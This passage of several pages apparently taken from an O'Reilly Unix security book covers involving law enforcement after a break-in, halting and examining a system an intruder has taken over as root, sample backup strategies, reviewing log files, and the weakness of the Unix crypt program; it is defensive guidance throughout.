Heavy-handed or inept investigative efforts may also place you in an uncomfortable position with respect<br />

to the computer community. Attitudes directed toward law-enforcement officers can easily be redirected<br />

toward you. Such attitudes can place you in a worse light than you deserve, and may hinder not only<br />

cooperation with the current investigation, but also with other professional activities. Furthermore, they<br />

may make you a target for electronic attack or other forms of abuse after the investigation concludes.<br />

These attitudes are unfortunate, because there are some very good investigators, and careful investigation<br />

and prosecution may be needed to stop malicious or persistent intruders.<br />

For these reasons, we encourage you to carefully consider the decision to involve law-enforcement<br />

agencies with any security problem pertaining to your system. In most cases, we suggest that you may<br />

not want to involve the criminal justice system at all unless a real loss has occurred, or unless you are<br />

unable to control the situation on your own. In some instances, the publicity involved in a case may be<br />

more harmful than the loss you have sustained. However, be aware that the problem you spot may be part<br />

of a much larger problem that is ongoing or beginning to develop. You may be risking further damage<br />

and delay if you decide to ignore the situation.<br />

We wish to stress the positive. Law-enforcement agencies are aware of the need to improve how they<br />

investigate computer crime cases, and they are working to develop in-service training, forensic analysis<br />

facilities, and other tools to help them conduct effective investigations. In many jurisdictions (especially<br />

in high-tech areas of the country), investigators and prosecutors have gained considerable experience and<br />

have worked to convey that information to their peers. The result is a significant improvement in law<br />

enforcement effectiveness over the last few years, with a number of successful investigations and<br />

prosecutions. You should very definitely think about the positive aspects of reporting a computer crime -<br />

not only for yourself, but for the community as a whole. Successful prosecutions may help dissuade<br />

further misuse of your system and of others' systems.<br />

26.2.5 If You or One of Your Employees Is a Target of an<br />

Investigation...<br />

If law-enforcement officials believe that your computer system has been used by an employee to break<br />

into other computer systems, to transmit or store controlled information (trade secrets, child<br />

pornography, etc.), or to otherwise participate in some computer crime, you may find your computers<br />

impounded by a search warrant (criminal cases) or writ of seizure (civil cases). If you can document that<br />

your employee has had limited access to your systems, and if you present that information during the<br />

search, it may help limit the scope of the confiscation. However, you may still be in a position in which<br />

some of your equipment is confiscated as part of a legal search.<br />

Local police or Federal authorities can present a judge with a petition to grant a search warrant if they<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_02.htm (5 of 8) [2002-04-12 10:45:05]


[Chapter 26] 26.2 Criminal Prosecution<br />

believe there is evidence to be found concerning a violation of a law. If the warrant is in order, the judge<br />

will almost always grant the search warrant. Currently, a few Federal investigators and law-enforcement<br />

personnel in some states have a poor reputation for heavy-handed and excessively broad searches. The<br />

scope of the search is usually detailed in the warrant by the agent in charge and approved by the judge;<br />

most warrants are derived from "boiler plate" examples that are themselves too broad. These problems<br />

have resulted in considerable ill will, and in the future might result in evidence not being admissible on<br />

Constitutional grounds because a search was too wide-ranging. How to define the proper scope of a<br />

search is still a matter of some evolution in the courts.<br />

Usually, the police seek to confiscate anything connected with the computer that may have evidence<br />

(e.g., files with stolen source code or telephone access codes). This confiscation might result in seizure of<br />

the computer, all magnetic media that could be used with the computer, anything that could be used as an<br />

external storage peripheral (e.g., videotape machines and tapes), auto-dialers that could contain phone<br />

numbers for target systems in their battery-backed memory, printers and other peripherals necessary to<br />

examine your system (in case it is nonstandard in setup), and all documentation and printouts. In past<br />

investigations, even laser printers, answering machines, and televisions have been seized by Federal<br />

agents.<br />

Officers are required to give a receipt for what they take. However, you may wait a very long time before<br />

you get your equipment back, especially if there is a lot of storage media involved, or if the officers are<br />

not sure what they are looking for. Your equipment may not even be returned in working condition -<br />

batteries discharge, media degrades, and dust works its way into moving parts.<br />

You should discuss the return of your equipment during the execution of the warrant, or thereafter with<br />

the prosecutors. You should indicate priorities (and reasons) for the items to be returned. In most cases,<br />

you can request copies of critical data and programs. As the owner of the equipment, you can also file<br />

suit[4] to have it returned, but such suits may drag on and may not be productive. Suits to recover<br />

damages may not be allowed against law-enforcement agencies that are pursuing a legitimate<br />

investigation.<br />

[4] If it is a Federal warrant, your lawyer may file a "Motion for Return of Property" under<br />

Rule 41(e) of the Federal Rules of Criminal Procedure.<br />

You can also challenge the reasons used to file the warrant and seek to have it declared invalid, forcing<br />

the return of your equipment. However, in some cases, warrants have been sealed to protect ongoing<br />

investigations and informants, so this option can be made much more difficult to execute. Equipment and<br />

media seized during a search may be held until a trial if they contain material to be used as prosecution<br />

evidence. Some state laws require forfeiture of the equipment on conviction.<br />

At present, a search is not likely to involve confiscation of a mainframe or even a minicomputer.<br />

However, confiscation of tapes, disks, and printed material could disable your business even if the<br />

computer itself is not taken. Having full backups offsite may not be sufficient protection, because tapes<br />

might also be taken by a search warrant. If you think that a search might curtail your legitimate business,<br />

be sure that the agents conducting the search have detailed information regarding which records are vital<br />

to your ongoing operation and request copies from them.<br />

Until the law is better defined in this area, you are well advised to consult with your attorney if you are at<br />

all worried that a confiscation might occur. Furthermore, if you have homeowners' or business insurance,<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_02.htm (6 of 8) [2002-04-12 10:45:05]


[Chapter 26] 26.2 Criminal Prosecution<br />

you might check with your agent to see if it covers damages resulting from law-enforcement agents<br />

during an investigation. Business interruption insurance provisions should also be checked if your<br />

business depends on your computer.<br />

26.2.6 Other Tips<br />

Here is a summary of additional observations about the application of criminal law to deter possible<br />

abuse of your computer. Note that most of these are simply good policy whether or not you anticipate<br />

break-ins.<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Replace any welcome message from your login program and /etc/motd file with warnings to<br />

unauthorized users stating that they are not welcome. We know of no legal precedent where a<br />

welcome message has been used as a successful defense for a break-in; however, some legal<br />

authorities have counselled against anything that might suggest a welcome for unwanted visitors.<br />

Put copyright and/or proprietary ownership notices in your source code and data files. Do so at the<br />

top of each and every file. If you express a copyright, consider filing for the registered copyright -<br />

this version can enhance your chances of prosecution and recovery of damages.<br />

Be certain that your users are notified about what they can and cannot do.<br />

If it is consistent with your policy, put all users of your system on notice about what you may<br />

monitor. This includes email, keystrokes, and files. Without such notice, monitoring an intruder or<br />

a user overstepping bounds could itself be a violation of wiretap or privacy laws!<br />

Keep good backups in a safe location. If comparisons against backups are necessary as evidence,<br />

you need to be able to testify as to who had access to the media involved. Having tapes in a public<br />

area probably will prevent them from being used as evidence.<br />

If something happens that you view as suspicious or that may lead to involvement of<br />

law-enforcement personnel, start a diary. Note your observations and actions, and note the times.<br />

Run paper copies of log files or traces and include those in your diary. A written record of events<br />

such as these may prove valuable during the investigation and prosecution. Note the time and<br />

context of each and every contact with law-enforcement agents, too.<br />

Try to define, in writing, the authorization of each employee and user of your system. Include in<br />

the description the items to which each person has legitimate access (and the items that each<br />

person cannot access). Have a mechanism in place so that each person is apprised of this<br />

description and can understand their limits.<br />

Tell your employees explicitly that they must return all materials, including manuals and source<br />

code, when requested or when their employment terminates.<br />

If something has happened that you believe requires law-enforcement investigation, do not allow<br />

your personnel to conduct their own investigation. Doing too much on your own may prevent<br />

some evidence from being used, or may otherwise cloud the investigation. You may also aggravate<br />

law-enforcement personnel with what they might perceive to be outside interference in their<br />

investigation.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_02.htm (7 of 8) [2002-04-12 10:45:05]


[Chapter 26] 26.2 Criminal Prosecution<br />

●<br />

●<br />

●<br />

●<br />

Make your employees sign an employment agreement that delineates their responsibilities with<br />

respect to sensitive information, machine usage, electronic mail use, and any other aspects of<br />

computer operation that might later arise. Make sure the policy is explicit and fair, and that all<br />

employees are aware of it and have signed the agreement. State clearly that all access and<br />

privileges terminate when employment does, and that subsequent access without permission will<br />

be prosecuted.<br />

Make contingency plans with your lawyer and insurance company for actions to be taken in the<br />

event of a break-in or other crime, related investigation, and subsequent events.<br />

Identify, ahead of time, law-enforcement personnel who are qualified to investigate problems that<br />

you may have. Introduce yourself and your concerns to them in advance of a problem. Having at<br />

least a nodding acquaintance will help if you later encounter a problem that requires you to call<br />

upon law enforcement for help.<br />

Consider joining societies or organizations that stress ongoing security awareness and training.<br />

Work to enhance your expertise in these areas.<br />

26.2.7 A Final Note on Criminal Actions<br />

Finally, keep in mind that criminal investigation and prosecution can only occur if you report the crime.<br />

If you fail to report the crime, there is no chance of apprehension. Not only does that not help your<br />

situation, it leaves the perpetrators free to harm someone else.<br />

A more subtle problem results from a failure to report serious computer crimes: such failure leads others<br />

to believe that there are few such crimes being committed. As a result, little emphasis is placed on<br />

budgets or training for new law-enforcement agents in this area, little effort is made to enhance the<br />

existing laws, and little public attention is focused on the problem. The consequence is that the<br />

computing milieu becomes incrementally more dangerous for all of us.<br />

26.1 Legal Options After a<br />

Break-in<br />

26.3 Civil Actions<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch26_02.htm (8 of 8) [2002-04-12 10:45:05]


[Chapter 24] 24.5 An Example<br />

24.5 An Example<br />

Chapter 24<br />

Discovering a Break-in<br />

Suppose you're a system administrator and John Q. Random is there with you in your office. Suddenly,<br />

an alert window pops up on your display, triggered by a Swatch rule monitoring the syslog output. The<br />

syslog message has indicated that John Q. Random has logged in and has used the su command to<br />

become root.<br />

The user must be an intruder - an intruder who has become root!<br />

Fortunately, in one of the windows on your terminal you have a superuser shell. You decide that the best<br />

course of action is to bring your system to an immediate halt. To do so, you execute the commands:<br />

# sync<br />

# /etc/init 0<br />

Alternatively, you can send a TERM signal to the init process:<br />

# sync<br />

# kill -TERM 1<br />

This method is not the recommended procedure on System V systems, but is required on BSD systems.<br />

Your decision to halt the system was based on the fact that you had no idea who this intruder was or what<br />

he was doing, and the fact that the intruder had become the superuser. After the intruder is the superuser,<br />

you don't know what parts of the operating system he is modifying, if any.<br />

For example, the intruder may be replacing system programs and destroying log files. You decide that<br />

the best thing you can do is to shut the system down and go to a protected terminal where you know that<br />

no other intruder is going to be interfering with the system while you figure out what's going on.<br />

The next step is to get a printed copy of all of the necessary logs that you may have available (e.g.,<br />

console logs and printed copies of network logs), and to examine these logs to try to get an idea of what<br />

the unauthorized intruder has done. You will also want to see if anything unusual has happened on the<br />

system since the intruder logged in. These logs may give you a hint as to what programs the intruder was<br />

running and what actions the intruder took. Be sure to initial and timestamp these printouts.<br />

Do not confine your examination to today's logs. If the intruder is now logged in as root, he may have<br />

also been on the system under another account name earlier. If your logs go back for a few days, examine<br />

the older versions as well. If they are on your backup tapes, consider retrieving them from the tapes.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_05.htm (1 of 3) [2002-04-12 10:45:05]


[Chapter 24] 24.5 An Example<br />

If the break-in is something that you wish to pursue further - possibly with law enforcement - be sure to<br />

do a complete backup of the system to tape. This way, you'll have evidence in the form of the corrupted<br />

system. Also, save copies of the logs. Keep a written log of everything you've done and are about to do,<br />

and be sure to write the time of day along with each notation.<br />

The next step is to determine how the intruder got in and then to make sure the intruder can't get in again.<br />

Examine the entire system. Check the permissions and the modes on all your files. Scan for new SUID or<br />

SGID files. Look for additions in /etc/passwd. If you have constructed checklists of your program<br />

directories, rerun them to look for any changes.<br />

Remember: the intruder may not be an outsider! The majority of major incidents occur from inside the<br />

organization, either from someone with current access or someone who recently had legitimate access.<br />

When you perform your evaluation, don't forget to consider the case that the behavior you saw coming<br />

from a user account was not someone breaking a password and coming in from outside, but was someone<br />

on the inside who broke the password, or perhaps it was the real account owner herself!<br />

Only after performing all these steps, and checking all this information, should you bring the system back<br />

up.<br />

24.5.1 Never Trust Anything Except Hardcopy<br />

If your system is compromised, don't trust anything that is online. If you discover changes in files on<br />

your system that seem suspicious, don't believe anything that your system tells you, because a good<br />

system cracker can change anything on the computer. This may seem extreme, but it is probably better to<br />

spend a little extra time restoring files and playing detective now than it would be to replay the entire<br />

incident when the intruder gets in again.<br />

Remember, an attacker who becomes the superuser on your computer can do anything to it, change any<br />

byte on the hard disk. The attacker can compile and install new versions of any system program - so there<br />

might be changes, but your standard utilities might not tell you about them. The attacker can patch the<br />

kernel that the computer is running, possibly disabling security features that you have previously<br />

enabled. The attacker can even open the raw disk devices for reading and writing. Essentially, attackers<br />

who becomes the superuser can warp your system to their liking - if they have sufficient skill,<br />

motivation, and time. Often, they don't need (or have) great skill. Instead, they have access to toolkits put<br />

together by others with more skill.<br />

For example, suppose you discover a change in a file and do an ls -l or an ls -lt. The modification time<br />

you see printed for the file may not be the actual modification time of the file. There are at least four<br />

ways for an attacker to modify the time that is displayed by this command, all of which have been used<br />

in actual system attacks:<br />

●<br />

●<br />

●<br />

The attacker could write a program that changes the modification time of the file using the<br />

utimes() system call.<br />

The attacker could have altered the system clock by using the date command. The attacker could<br />

then modify your files and, finally, reset the date back again. This technique has the advantage for<br />

the attacker that the inode access and creation times also get set.<br />

The attacker could write to the raw disk, changing saved values of any stored time.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_05.htm (2 of 3) [2002-04-12 10:45:05]


[Chapter 24] 24.5 An Example<br />

●<br />

The attacker could have modified the ls command to show a predetermined modification time<br />

whenever this file is examined.<br />

The only limit to the powers of an attacker who has gained superuser status is that the attacker cannot<br />

change something that has been printed on a line printer or a hardcopy terminal. For this reason, if you<br />

have a logging facility that logs whenever the date is changed, you might consider having the log made<br />

to a hardcopy terminal or to another computer. Then, be sure to examine this log on a regular basis.<br />

It is also the case that we recommend that you have a bootable copy of your operating system on a<br />

removable disk pack so, when needed, you can boot from a known good copy of the system and do your<br />

examination of the system with uncorrupted tools. Coupled with a database of message digests of<br />

unmodified files such as that produced by a tool such as Tripwire, you should be able to find anything<br />

that was modified on your system.<br />

24.4 Cleaning Up After the<br />

Intruder<br />

24.6 Resuming Operation<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch24_05.htm (3 of 3) [2002-04-12 10:45:05]


[Chapter 7] 7.2 Sample Backup Strategies<br />

Chapter 7<br />

Backups<br />

7.2 Sample Backup Strategies<br />

A backup strategy describes how often you back up each of your computer's partitions, what kinds of<br />

backups you use, and for how long backups are kept. Backup strategies are based on many factors,<br />

including:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

How much storage the site has<br />

The kind of backup system that is used<br />

The importance of the data<br />

The amount of time and money available for conducting backups<br />

Expected uses of the backup archive<br />

In the following sections, we outline some typical backup strategies for several different situations.<br />

7.2.1 Individual Workstation<br />

Most users do not back up their workstations on a regular basis: they think that backing up their data is<br />

too much effort. Unfortunately, they don't consider the effort required to retype everything that they've<br />

ever done to recover their records.<br />

Here is a simple backup strategy for users with PCs or stand-alone workstations:<br />

7.2.1.1 Backup plan<br />

Full backups<br />

Once a month, or after a major software package is installed, back up the entire system. At the<br />

beginning of each year, make two complete backups and store them in different locations.<br />

Project-related backups<br />

Back up current projects and critical files with specially written Perl or shell scripts. For example,<br />

you might have a Perl script that backs up all of the files for a program you are writing, or all of<br />

the chapters of your next book. These files can be bundled and compressed into a single tar file,<br />

which can often then be stored on a floppy disk or saved over the network to another computer.<br />

Home-directory backups<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_02.htm (1 of 6) [2002-04-12 10:45:06]


[Chapter 7] 7.2 Sample Backup Strategies<br />

If your system is on a network, write a shell script that backs up your home directory to a remote<br />

machine. Set the script to automatically run once a day, or as often as is feasible. But beware: if<br />

you are not careful, you could easily overwrite your backup with a bad copy before you realize that<br />

something needs to be restored. Spending a few extra minutes to set things up properly (for<br />

example, by keeping three or four home-directory backups on different machines, each updated on<br />

a different day of the week) can save you a lot of time (and panic) later.<br />

This strategy never uses incremental backups; instead, complete backups of a particular set of files are<br />

always created. Such project-related backups tend to be incredibly comforting and occasionally valuable.<br />

Retention schedule<br />

Keep the monthly backups two years. Keep the yearly backups forever.<br />

7.2.1.2 Media rotation<br />

If you wish to perform incremental backups, you can improve their reliability by using media rotation. In<br />

implementing this strategy, you actually create two complete sets of backup tapes, A and B. At the<br />

beginning of your backup cycle, you perform two complete dumps, first to tape A, and then on the<br />

following day, to tape B. Each day you perform an incremental dump, alternating tapes A and B. In this<br />

way, each file is backed up in two locations. This scheme is shown graphically in Figure 7.2.<br />

Figure 7.2: Incremental backup with media rotation<br />

7.2.2 Small Network of Workstations and a Server<br />

Most small groups rely on a single server with up to a few dozen workstations. In our example, the<br />

organization has a single server with several disks, 15 workstations, and DAT tape backup drive.<br />

The organization doesn't have much money to spend on system administration, so it sets up a system for<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_02.htm (2 of 6) [2002-04-12 10:45:06]


[Chapter 7] 7.2 Sample Backup Strategies<br />

backing up the most important files over the network to a specially designed server.<br />

Server configuration Drive #1: /, /usr, /var (standard <strong>UNIX</strong> filesystems)<br />

Drive #2: /users (user files)<br />

Drive #3: /localapps (locally installed applications)<br />

Client configuration Clients are run as "dataless workstations" and are not backed up. Most clients are<br />

equipped with a 360MB hard disk, although one client has a 1GB drive.<br />

7.2.2.1 Backup plan<br />

Monthly backups<br />

Once a month, each drive is backed up onto its own tape with the <strong>UNIX</strong> dump utility. This is a full<br />

backup, also known as a level 0 dump.<br />

Weekly backups<br />

Once a week, an incremental backup on drive #1 and drive #3 is written to a DAT tape (Level 1<br />

dump). The entire /users filesystem is then added to the end of that tape (Level 0 dump).<br />

Daily backups<br />

A Level 1 dump on drive #2 is written to a file which is stored on the local hard disk of the client<br />

equipped with the 1GB hard drive. The backup is compressed as it is stored.<br />

Hourly backups<br />

Every hour, a special directory, /users/activeprojects, is archived in a tar file. This file is sent over<br />

the network to the client workstation with the 1GB drive. The last eight files are kept, giving<br />

immediate backups in the event that a user accidentally deletes or corrupts a file. The system<br />

checks the client to make sure that it has adequate space on the drive before beginning each hourly<br />

backup.<br />

The daily and hourly backups are done automatically via scripts run by the cron daemon. All monthly<br />

and weekly backups are done with shell scripts that are run manually. The scripts both perform the<br />

backup and then verify that the data on the tape can be read back, but the backups do not verify that the<br />

data on the tape is the same as that on the disk. (No easy verification method exists for the standard<br />

<strong>UNIX</strong> dump/restore programs.)<br />

Automated systems should be inspected on a routine basis to make sure they are still working as planned.<br />

You may have the script notify you when completed, sending a list of any errors to a human (in addition<br />

to logging them in a file).<br />

NOTE: If data confidentiality is very important, or if there is a significant risk of packet<br />

sniffing, you should design your backup scripts so that unencrypted backup data is never<br />

sent over the network.<br />

7.2.2.2 Retention schedule<br />

Monthly backups<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_02.htm (3 of 6) [2002-04-12 10:45:06]


[Chapter 7] 7.2 Sample Backup Strategies<br />

Kept for a full calendar year. Each quarterly backup is kept as a permanent archive for a few years.<br />

The year-end backups are kept forever.<br />

Weekly backups<br />

Kept on four tapes, which are recycled each month. These tapes should be thrown out every five<br />

years (60 uses), although the organization will probably have a new tape drive within five years<br />

that uses different kinds of tapes.<br />

Daily backups<br />

One day's backup is kept. Each day's backup overwrites the previous day's.<br />

7.2.3 Large Service-Based Network with Small Budgets<br />

Most large decentralized organizations, such as universities, operate networks with thousands of users<br />

and a high degree of autonomy between system operators. The primary goal of the backup system of<br />

these organizations is to minimize downtime in the event of hardware failure or network attack; if<br />

possible, the system can also restore user files deleted or damaged by accident.<br />

Server configuration<br />

Primary servers Drive #1: /, /usr, /var (standard <strong>UNIX</strong> filesystems)<br />

Drives #2-5: user files<br />

<strong>Sec</strong>ondary server (matches each primary) Drive #1: /, /usr, /var (standard <strong>UNIX</strong> filesystems)<br />

Drives #2-6: Backup staging area<br />

Client configuration Clients are run as "dataless workstations" and are not backed<br />

up. Most clients are equipped with a 500MB hard disk. The<br />

clients receive monthly software distributions from a trusted<br />

server, by CD-ROM or network. Each distribution includes all<br />

files and results in a reload of a fresh copy of the operating<br />

system. These distributions keep the systems up to date,<br />

discourage local storage by users, and reduce the impact (and<br />

lifetime) of Trojan horses and other unauthorized<br />

modifications of the operating system.<br />

7.2.3.1 Backup plan<br />

Every night, each backup staging area drive is erased and then filled with the contents of the matching<br />

drive on its matching primary server. The following morning, the entire disk is copied to a high-speed<br />

8mm tape drive.<br />

Using special secondary servers dramatically eases the load of writing backup tapes. This strategy also<br />

provides a hot replacement system should the primary server fail.<br />

7.2.3.2 Retention schedule<br />

Backups are retained for two weeks. During that time, users can have their files restored to a special<br />

"restoration" area, perhaps for a small fee. Users who wish archival backups for longer than two weeks<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_02.htm (4 of 6) [2002-04-12 10:45:06]


[Chapter 7] 7.2 Sample Backup Strategies<br />

must arrange backups of their own. One of the reasons for this decision is privacy: users should have a<br />

reasonable expectation that if they delete their files, the backups will be erased at some point in the<br />

future.<br />

7.2.4 Large Service-Based Networks with Large Budgets<br />

Many banks and other large firms have requirements for minimum downtime in the event of a failure.<br />

Thus, current and complete backups that are ready to go at a moment's notice are vital. In this scheme,<br />

we do not use magnetic media at all. Instead, we use a network and special disks.<br />

Each of the local computers uses RAID (Redundant Arrays of Independent Storage) for local disk. Every<br />

write to disk is mirrored on another disk automatically, so the failure of one has no user-noticeable<br />

effects.<br />

Meanwhile, the entire storage of the system is mirrored every night at 2 a.m. to a set of remote disks in<br />

another state (a hot site). This mirroring is done using a high-speed, encrypted leased network line. At the<br />

remote location, there is an exact duplicate of the main system. During the day, a running log of activities<br />

is kept and mirrored to the remote site as it is written locally.<br />

If a failure of the main system occurs, the remote system is activated. It replays the transaction log and<br />

duplicates the changes locally, and then takes over operation for the failed main site.<br />

Every morning, a CD-ROM is made of the disk contents of the backup system, so as not to slow actual<br />

operations. The contents are then copied, and the copies sent by bonded courier to different branch<br />

offices around the country, where they are saved for seven years. Data on old tapes will be migrated to<br />

new backup systems as the technology becomes available.<br />

7.2.5 Deciding upon a Backup Strategy<br />

The key to deciding upon a good strategy for backups is to understand the importance and<br />

time-sensitivity of your data. As a start, we suggest that answers to the following questions will help you<br />

plan your backups:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

How quickly do you need to resume operations after a complete loss of the main system?<br />

How quickly do you need to resume operations after a partial loss?<br />

Can you perform restores while the system is "live?"<br />

Can you perform backups while the system is "live?"<br />

What data do you need restored first? Next? Last?<br />

Of the users you must listen to, who will complain the most if their data is not available?<br />

What will cause the biggest loss if it is not available?<br />

Who loses data most often from equipment or human failures?<br />

How many spare copies of the backups must you have to feel safe?<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_02.htm (5 of 6) [2002-04-12 10:45:06]


[Chapter 7] 7.2 Sample Backup Strategies<br />

●<br />

●<br />

How long do you need to keep each backup?<br />

How much are you willing or able to spend?<br />

7.1 Make Backups! 7.3 Backing Up System Files<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_02.htm (6 of 6) [2002-04-12 10:45:06]


[Chapter 10] 10.8 Managing Log Files<br />

Chapter 10<br />

Auditing and Logging<br />

10.8 Managing Log Files<br />

There are several final suggestions we can make about log files. The first has to do with backups. We<br />

strongly recommend that you ensure that all of your log files are copied to your backup media on a<br />

regular basis, preferably daily. The timing of the backups should be such that any file that is periodically<br />

reset is copied to the backups before the reset is performed. This will ensure that you have a series of<br />

records over time to show system access and behavior.<br />

Our second suggestion concerns how often to review the log files. We recommend that you do this at<br />

least daily. Keeping log records does you little service if you do not review them on a regular basis. Log<br />

files can reveal problems with your hardware, with your network configuration, and (of course) with<br />

your security. Consequently, you must review the logs regularly to note when a problem is actually<br />

present. If you delay for too long, the problem may become more severe; if there has been an intruder, he<br />

or she may have the time to edit the log files, change your security mechanisms, and do dirty deeds<br />

before you take notice.<br />

Our third suggestion concerns how you process your log messages. Typically, log messages record<br />

nothing of particular interest. Thus, every time you review the logs (possibly daily, or several times a<br />

day, if you take our previous suggestion), you are faced with many lines of boring, familiar messages.<br />

The problem with this scenario is that you may become so accustomed to seeing this material that you<br />

get in the habit of making only a cursory scan of the messages to see if something is wrong, and this way<br />

you can easily miss an important message.<br />

To address this problem, our advice is to filter the messages that you actually look at to reduce them to a<br />

more manageable collection. To do so requires some care, however. You do not want to write a filter that<br />

selects those important things you want to see and discards the rest. Such a system is likely to result in an<br />

important message being discarded without being read. Instead, you should filter out the boring<br />

messages, being as specific as you can with your pattern matching, and pass everything else to you to be<br />

read. Periodically, you should also study unfiltered log messages to be sure that you are not missing<br />

anything of importance.<br />

Our last suggestion hints at our comments in Chapter 27, Who Do You Trust?, Who Do You Trust?<br />

Don't trust your logs completely! Logs can often be altered or deleted by an intruder who obtains<br />

superuser privileges. Local users with physical access or appropriate knowledge of the system may be<br />

able to falsify or circumvent logging mechanisms. And, of course, software errors and system errors may<br />

result in logs not being properly collected and saved. Thus, you need to develop redundant scanning and<br />

logging mechanisms: because something is not logged does not mean it didn't happen.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_08.htm (1 of 2) [2002-04-12 10:45:06]


[Chapter 10] 10.8 Managing Log Files<br />

Of course, simply because something was logged doesn't mean it did happen, either - someone may cause<br />

entries to be written to logs to throw you off the case of a real problem or point a false accusation at<br />

someone else. These deceptions are easy to create with syslog if you haven't protected the network port<br />

from messages originating outside your site!<br />

10.7 Handwritten Logs 11. Protecting Against<br />

Programmed Threats<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch10_08.htm (2 of 2) [2002-04-12 10:45:06]


Chapter 6<br />

Cryptography<br />

6.6 Encryption Programs Available for <strong>UNIX</strong><br />

This section describes three encryption programs that are available today on many <strong>UNIX</strong> systems:<br />

crypt<br />

des<br />

pgp<br />

[Chapter 6] 6.6 Encryption Programs Available for <strong>UNIX</strong><br />

The original <strong>UNIX</strong> encryption application.<br />

An implementation of the Data Encryption Standard.<br />

Phil Zimmermann's Pretty Good Privacy.<br />

Each of these programs offers increasing amounts of security, but the more secure programs have more legal restrictions on their<br />

use in the United States.[24] Many other countries have passed legislation severely restricting or outlawing the use of strong<br />

cryptography by private citizens.<br />

[24] We don't mean to slight our readers in countries other than the U.S., but we are not familiar with all of the<br />

various national laws and regulations around the world. You should check your local laws to discover if there are<br />

restrictions on your use of these programs.<br />

6.6.1 <strong>UNIX</strong> crypt: The Original <strong>UNIX</strong> Encryption Command<br />

<strong>UNIX</strong> crypt is an encryption program that is included as a standard part of the <strong>UNIX</strong> operating system. It is a very simple<br />

encryption program that is easily broken, as evidenced by AT&T's uncharacteristic disclaimer on the man page:<br />

BUGS: There is no warranty of merchantability nor any warranty of fitness for a particular purpose nor any other<br />

warranty, either express or implied, as to the accuracy of the enclosed materials or as to their suitability for any<br />

particular purpose. Accordingly, Bell Telephone Laboratories assumes no responsibility for their use by the<br />

recipient. Further, Bell Laboratories assumes no obligation to furnish any assistance of any kind whatsoever, or to<br />

furnish any additional information or documentation.<br />

- crypt reference page<br />

Note that the crypt program is different from the more secure crypt() library call, which is described in Chapter 8, Defending<br />

Your Accounts.<br />

6.6.1.1 The crypt program<br />

The crypt program uses a simplified simulation of the Enigma encryption machine described in "The Enigma Encryption<br />

System" earlier in this chapter. Unlike Enigma, which had to encrypt only letters, crypt must be able to encrypt any block of<br />

8-bit data. As a result, the rotors used with crypt must have 256 "connectors" on each side. A second difference between Enigma<br />

and crypt is that, while Enigma used three or four rotors and a reflector, crypt uses only a single rotor and reflector. The<br />

encryption key provided by the user determines the placement of the virtual wires in the rotor and reflector.<br />

Partially because crypt has but a single rotor, files encrypted with crypt are exceedingly easy for a cryptographer to break. For<br />

several years, noncryptographers have been able to break messages encrypted with crypt as well, thanks to a program developed<br />

in 1986 by Robert Baldwin, then at the MIT Laboratory for Computer Science. Baldwin's program, Crypt Breaker's Workbench<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_06.htm (1 of 13) [2002-04-12 10:45:07]


[Chapter 6] 6.6 Encryption Programs Available for <strong>UNIX</strong><br />

(CBW), decrypts text files encrypted with crypt within a matter of minutes, with minimal help from the user.<br />

CBW breaks crypt by searching for arrangements of "wires" within the "rotor" that cause a file encrypted with crypt to decrypt<br />

into plain ASCII text. The task is considerably simpler than it may sound at first, because normal ASCII text uses only 127 of the<br />

possible 256 different code combinations (the ASCII codes 0 and 128 through 255 do not appear in normal <strong>UNIX</strong> text). Thus,<br />

most arrangements of the "wires" produce invalid characters when the file is decrypted; CBW automatically discards these<br />

arrangements.<br />

CBW has been widely distributed; as a result, files encrypted with crypt should not be considered secure. (They weren't secure<br />

before CBW was distributed; fewer people simply had the technical skill necessary to break them.)<br />

6.6.1.2 Ways of improving the security of crypt<br />

We recommend that you do not use crypt to encrypt files more than 1K long. Nevertheless, you may have no other encryption<br />

system readily available to you. If this is the case, you are better off using crypt than nothing at all. You can also take a few<br />

simple precautions that will decrease the chances that your encrypted files will be decrypted:[25]<br />

●<br />

●<br />

●<br />

[25] In particular, these precautions will defeat CBW's automatic crypt-breaking activities.<br />

Encrypt the file multiple times, using different keys at each stage. This essentially changes the transformation.<br />

Compress your files before encrypting them. Compressing a file alters the information - the plain ASCII text - that<br />

programs such as CBW use to determine when they have correctly assembled part of the encryption key. If your message<br />

does not decrypt into plain text, CBW will not determine when it has correctly decrypted your message. However, if your<br />

